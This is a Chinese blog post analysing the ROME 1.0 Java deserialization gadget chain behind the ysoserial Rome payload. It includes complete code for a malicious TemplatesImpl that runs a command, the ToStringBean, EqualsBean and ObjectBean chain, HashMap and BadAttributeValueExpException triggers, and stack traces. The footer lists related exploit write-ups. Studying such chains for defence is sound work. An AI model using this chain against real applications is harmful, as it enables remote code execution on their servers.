『Java安全』反序列化-Rome 1.0反序列化POP链分析_ysoserial Rome payload分析

最新推荐文章于 2024-07-11 09:19:22 发布
最新推荐文章于 2024-07-11 09:19:22 发布
阅读量1.9k 收藏 1
点赞数 3
分类专栏: # 反序列化 文章标签: java web安全 反序列化 Rome TemplatesImpl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123330443
版权

文章目录

前言

版本

本笔记实验采用Rome1.0 + jdk8u261

        <!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
        <dependency>
            <groupId>rome</groupId>
            <artifactId>rome</artifactId>
            <version>1.0</version>
        </dependency>

代码审计 | 原理分析

1. ToStringBean.toString()触发TemplatesImpl.getOutputProperties()

ToStringBean类构造器传入一个类和对象
在这里插入图片描述
调用toString方法会获取指定类的getter方法,然后在下面invoke
在这里插入图片描述

在这里插入图片描述
因此只要构造器传入Templates类和恶意TemplatesImpl即可完成触发getOutputProperties()

手动调用ToStringBean.toString()示例代码

首先生成恶意AbstractTranslet类,复用之前复现7u21的代码

package jdk7u21;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;

public class GenerateEvilByJavaassist {
    public static byte[] generate() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("E");
        CtClass zuper = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(zuper);

        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        clazz.addConstructor(constructor);

        return clazz.toBytecode();
    }


}

接着生成恶意TemplatesImpl

package jdk7u21;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import java.lang.reflect.Field;

public class GetTemplatesImpl {
    public static TemplatesImpl getTemplatesImpl() throws Exception{
        byte[][] bytes = new byte[][]{GenerateEvilByJavaassist.generate()};

        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        setValue(templates, "_bytecodes", bytes);
        setValue(templates, "_name", "a");
        setValue(templates, "_tfactory", new TransformerFactoryImpl());

        return  templates;
    }

    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

new ToStringBean对象,传入Templates类和恶意TemplatesImpl,然后调用toString方法

package ROME;

import com.sun.syndication.feed.impl.ToStringBean;
import jdk7u21.GetTemplatesImpl;

import javax.xml.transform.Templates;

public class ManualToStringBeanToString {
    public static void main(String[] args) throws Exception {
        ToStringBean toStringBean = new ToStringBean(Templates.class, GetTemplatesImpl.getTemplatesImpl());
        toStringBean.toString();
    }
}

在这里插入图片描述

2. EqualsBean.hashCode()触发toString()

EqualsBean的构造器也是传入一个类和一个该类实例
在这里插入图片描述
然后调用它的hashCode方法就会先触发obj实例的toString
在这里插入图片描述
因此传入ToStringBean类和恶意ToStringBean实例即可完成触发toString

手动调用EqualsBean.hashCode()示例代码

new EqualsBean对象,传入ToStringBean类和恶意ToStringBean实例,调用hashCode

package ROME;

import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ToStringBean;
import jdk7u21.GetTemplatesImpl;

import javax.xml.transform.Templates;

public class ManualEqualsBeanHashCode {
    public static void main(String[] args) throws Exception {
        ToStringBean toStringBean = new ToStringBean(Templates.class, GetTemplatesImpl.getTemplatesImpl());
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
        equalsBean.hashCode();
    }
}

在这里插入图片描述

3. ObjectBean触发toString()或hashCode()

ObjectBean包含了EqualsBean和ToStringBean
在这里插入图片描述
它同时拥有hashCode和toString方法,都是调包含的EqualsBean和ToStringBean
在这里插入图片描述
因此这里就有五种调用链:

  • 调用ObjectBean构造器、随便传值,使用反射赋值EqualsBean,调用hashCode
  • 调用ObjectBean构造器、随便传值,使用反射赋值ToStringBean,调用toString
  • 调用ObjectBean构造器、传入EqualsBean,调用两个方法均可
  • 调用ObjectBean构造器、传入ToStringBean,调用两个方法均可
  • 调用ObjectBean构造器、传入Templates,调用toString

ysoserial采用的是第一条链子

手动调用ObjectBean.toString()和hashCode()示例代码

首先写一个封装反射传值的函数

package ReflectPacked;

import java.lang.reflect.Field;

public class SetValue {
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

new ObjectBean对象,一共有五种方法,然后手动调用toString和hashCode

package ROME;

import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import jdk7u21.GetTemplatesImpl;

import javax.xml.transform.Templates;

public class ManualObjectBean {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();
        ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);

        {
            ObjectBean objectBean = new ObjectBean(String.class, "a");
            // 复用之前封装好了的反射赋值方法
            ReflectPacked.SetValue.setValue(objectBean, "_equalsBean", equalsBean);
            objectBean.hashCode();
        }

        {
            ObjectBean objectBean = new ObjectBean(String.class, "a");
            ReflectPacked.SetValue.setValue(objectBean, "_toStringBean", toStringBean);
            objectBean.toString();
        }

        {
            ObjectBean objectBean = new ObjectBean(EqualsBean.class, equalsBean);
            objectBean.hashCode();
            objectBean.toString();
        }

        {
            ObjectBean objectBean = new ObjectBean(ToStringBean.class, toStringBean);
            objectBean.hashCode();
            objectBean.toString();
        }

        {
            ObjectBean objectBean = new ObjectBean(Templates.class, templates);
            objectBean.toString();
        }

    }
}

4.1. HashMap反序列化触发hashCode

HashMap重写readObject调用了hash
在这里插入图片描述
然后调用hashCode
在这里插入图片描述
因此只要把EqualsBean或ObjectBean put进去反序列化就会触发hashCode

同样的:HashMap的子类:LinkedHashSet、HashTable也会触发

HashMap反序列化示例代码

先封装一个反序列化的方法:

package UnserializePacked;

import java.io.*;

public class Unserialize {
    public static void unserialize(Object obj) throws Exception{
        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(obj);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

生成HashMap的方法,put ObjectBean或EqualsBean,然后反序列化

package ROME;

import UnserializePacked.Unserialize;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import jdk7u21.GetTemplatesImpl;
import javax.xml.transform.Templates;
import java.util.HashMap;

public class Manual {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();
        ToStringBean toStringBean = new ToStringBean(Templates.class, templates);
        EqualsBean equalsBean = new EqualsBean(ToStringBean.class, toStringBean);
        ObjectBean objectBean = new ObjectBean(String.class, "a");

        ReflectPacked.SetValue.setValue(objectBean, "_equalsBean", equalsBean);

        HashMap hashMap = new HashMap();
        hashMap.put(objectBean ,1);
        Unserialize.unserialize(hashMap);
    }
}

在这里插入图片描述

4.2. BadAttributeValueExpException反序列化触发toString

既然要触发ToString的toString方法,还想到了CC5也是BadAttributeValueExpException触发toString的。

readObject会调用toString
在这里插入图片描述
因此只要利用反射给val参数赋值即可触发

BadAttributeValueExpException反序列化示例代码

package ROME;

import UnserializePacked.Unserialize;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;
import jdk7u21.GetTemplatesImpl;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;

public class Manual2 {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();
        ToStringBean toStringBean = new ToStringBean(Templates.class, templates);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        ReflectPacked.SetValue.setValue(badAttributeValueExpException, "val", toStringBean);

        Unserialize.unserialize(badAttributeValueExpException);
    }
}

在这里插入图片描述

POP链

HashMap

ysoserial采用的是这条链子

getOutputProperties:506, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
toString:137, ToStringBean (com.sun.syndication.feed.impl)
toString:116, ToStringBean (com.sun.syndication.feed.impl)
beanHashCode:193, EqualsBean (com.sun.syndication.feed.impl)
hashCode:110, ObjectBean (com.sun.syndication.feed.impl)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
main:21, Manual (ROME)

BadAttributeValueExpException

getOutputProperties:506, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect) [2]
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
toString:137, ToStringBean (com.sun.syndication.feed.impl)
toString:116, ToStringBean (com.sun.syndication.feed.impl)
readObject:86, BadAttributeValueExpException (javax.management)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect) [1]
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1185, ObjectStreamClass (java.io)
readSerialData:2256, ObjectInputStream (java.io)
readOrdinaryObject:2147, ObjectInputStream (java.io)
readObject0:1646, ObjectInputStream (java.io)
readObject:482, ObjectInputStream (java.io)
readObject:440, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:20, Manual2 (ROME)

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123330443
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
WEB安全渗透测试》(36) JAVA反序列化工具ysoserial使用介绍
午夜安全
05-31 1794
作者介绍:ysoserial是一款用于生成利用不安全Java对象反序列化的有效负载的概念验证工具。ysoserial其实就是工具,集合了各种java反序列化payload,利用它可以方便的测试反序列化漏洞。
Java反序列化生成Payload附利用脚本
02-12
Java反序列化生成Payload附利用脚本,帮助运维测试weblogic及jboss等中间件的漏洞。
ROME反序列化-TemplatesImpl链子
chenxiaoyinaida的博客
11-10 413
前言: ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。 正题: 这个链子是通过HashMap调用ObjectBean的hashCode()方法来完成RCE。 这里放一下链子会用到的一些必要代码,接下来进行相应的调试 public int hashCode() { return this._equalsBean.beanHashCode(); } 当调用hashCode之后会调用beanHashCode(),..
ROME 反序列化
最新发布
2301_79700060的博客
07-11 693
ROME是主要用于解析RSS和Atom种子的一个Java框架。ROME 是一个可以兼容多种格式的 feeds 解析器,可以从一种格式转换成另一种格式,也可返回指定格式或 Java 对象。ROME 兼容了 RSS (0.90, 0.91, 0.92, 0.93, 0.94, 1.0, 2.0), Atom 0.3 以及 Atom 1.0 feeds 格式。他有个特殊的位置就是ROME提供了ToStringBean这个类,提供深入的toString方法对Java Bean进行操作。
[Java反序列化]rome反序列化学习
feng的博客
11-09 1288
前言 也算是忙里偷闲了,看了一下午的操作系统感觉自己就是傻子。。。晚上把前段时间的战疫比赛遇到的rome反序列化链给学习了一下,之后应该还是继续课内的学习,除了打打比赛,其他的学习得等到寒假了。 分析 从网上找了利用链: TemplatesImpl.getOutputProperties() NativeMethodAccessorImpl.invoke0(Method, Object, Object[]) NativeMethodAccessorImpl.invoke(Object, Object[])
ROME反序列化分析
qq_53263789的博客
03-29 656
title: ROME反序列化 categories: java反序列化 Rome Rome 就是为 RSS聚合开发的框架, 可以提供RSS阅读和发布器。 Rome 提供了 ToStringBean 这个类,提供深入的 toString 方法对JavaBean进行操作 Calc package bytecode; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xs.
pop 反序列化
dibanfu3470的博客
03-22 314
题目网址: http://srpopty.cn:8081/PHP/serialize.php 看到声明了Foo1,重新构造Foo1,里面调用Flag类 得到构造的串: O:4:"Foo1":1:{s:9:"%00Foo1%00obj";O:4:"Flag":0:{}} 注意:obj是私有变量,前面加类名,并且类名前后加上%00(保护类型的前加上%00*%0...
java 反序列化利用工具marshalsec-0.0.3-SNAPSHOT-all
12-27
-a:生成exploit下的所有payload(例如:hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin) -t:对生成的payloads进行解码测试 -v:verbose mode...
S24-C3P0反序列化1
08-03
S24-C3P0反序列化攻击的原理是利用C3P0和ROME反序列化机制,结合fastjson的反序列化漏洞,实现远程代码执行的攻击。该攻击方法需要攻击者精心构造恶意payload,并将其传输到目标服务器,实现远程代码执行。 在...
二次反序列化 看我一命通关
msbz7的博客
08-17 784
不记得是哪一场比赛了,遇到了一个 Java 的题目,过滤了很多关键类,不管小编把 CC 链如何拆开组合,都没有办法绕过。就在此时,大佬看了一眼说,用二次反序列化就可以绕过了。“二次反序列化”这六个字重重地敲在了我的心巴上,从那以后我就对二次反序列化产生了莫名的渴望。小编开始详细学习时,发现没有二次反序列化比较系统的学习文章,那么,就自己总结一个。简单介绍下二次反序列化,顾名思义,就是反序列化两次,其主要意义是PS:本文用到的工具类会放在文末它,是下一个用于创建真实运行时对象的类,更具体地说,...
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3376
ysoserial这款工具,堪称为“java反序列利用神器”。
Rome反序列化
01-22 716
Rome反序列化 Gadget /* * Gadget: * HashMap#readObject * ObjectBean#hashCode * EqualsBean#beanHashCode * ToStringBean#toString * TemplatesImpl#getOutputProperties * */ HashMap#readObject 可以调用到任意一个类的 hashCode 方法,这里调用到的是 Obje
[Java反序列化]—Rome反序列化
Sentiment的博客
04-28 541
ROME可能是目前最完善的开源聚合工具,ROME支持绝大多数的RSS协议。
mysql 反序列化函数_MySQL客户端jdbc反序列化漏洞payload
weixin_29441555的博客
01-21 307
MySQL JDBC Deserialization Payload / MySQL客户端jdbc反序列化漏洞描述当MySQL JDBC url可控时,除了能利用 MySQL 协议读取MySQL Client的本地文件之外,还可以利用客户端在连接服务器时会反序列化 服务器 返回的二进制数据,从而触发反序列化漏洞。详情1. 安装rewrite插件以下安装方式任选其一【任选】编译插件gcc -shar...
Java反序列化漏洞-ROME利用链分析
l11III1111的博客
12-04 3440
直接看到执行getOutputProperties的方法 调用了BeanIntrospector.getPropertyDescriptors(_beanClass)获取_beanClass中的所有的getter和setter方法。其中_beanClass是我们在ObjectBean中传入的一个class类型的对象 具体获取getter和setter方法在getPDs的另一个重载了的方法里面 而我们知道TemplatesImpl的getOutputProperties前面是以get开头的满足这个格式,
Java反序列 Jdk7u21 Payload 学习笔记
weixin_44476888的博客
04-24 1652
0x00 简介 最近在看Java 反序列化的一些东西,在学习 ysoserial 的代码时,看到 payload list 中有一个比较特殊的 Jdk7u21,该 payload 不依赖第三方库,只需 JRE 即可完成攻击,影响 JRE versions <=7u21 的版本。在学习的过程中,觉得很有意思,这里记录一下的过程,如果有什么地方写的不准确或错误,欢迎指出 文章中的代码运行环境为...
Javaweb安全——反序列化漏洞-Rome
weixin_43610673的博客
01-30 366
核心是 ToStringBean#toString()会调用其封装类的所有无参 getter方法
pop链子的构造+反序列化(学习ing)
giaogiao123的博客
08-16 783
最近做了强网杯的赌徒,写一下心得体会,第一次构造pop链子,我们先从BUUCTF [MRCTF2020]Ezpop说起 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值